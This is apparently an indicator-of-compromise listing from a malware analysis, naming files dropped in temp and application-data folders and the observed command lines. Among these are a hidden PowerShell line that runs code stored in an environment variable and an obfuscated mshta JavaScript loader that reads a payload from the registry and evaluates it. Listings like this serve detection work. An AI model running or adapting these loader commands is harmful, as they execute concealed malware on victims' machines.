Technical Information
- %TEMP%\nsv67b8.tmp
- %APPDATA%\bluestonemainsail
- %APPDATA%\entropy.mm
- %APPDATA%\biblioentry.item.separator.xml
- %APPDATA%\tweakrepairwinsock_fi.p5p
- %APPDATA%\toddler.dll
- %APPDATA%\system.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:xgowvrq' (with hidden window)
- '<SYSTEM32>\mshta.exe' javascript:bgOR5iVd8W="V";o8N4=new%20ActiveXObject("WScript.Shell");vxsmh7R="RLYnmc53SL";BR7SY=o8N4.RegRead("HKLM\\software\\Wow6432Node\\W3ZOGA0\\sNswp97");L2bbozkF="YU";eval(BR7SY);vf4ulXWb9P...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:xgowvrq
- '%WINDIR%\syswow64\regsvr32.exe'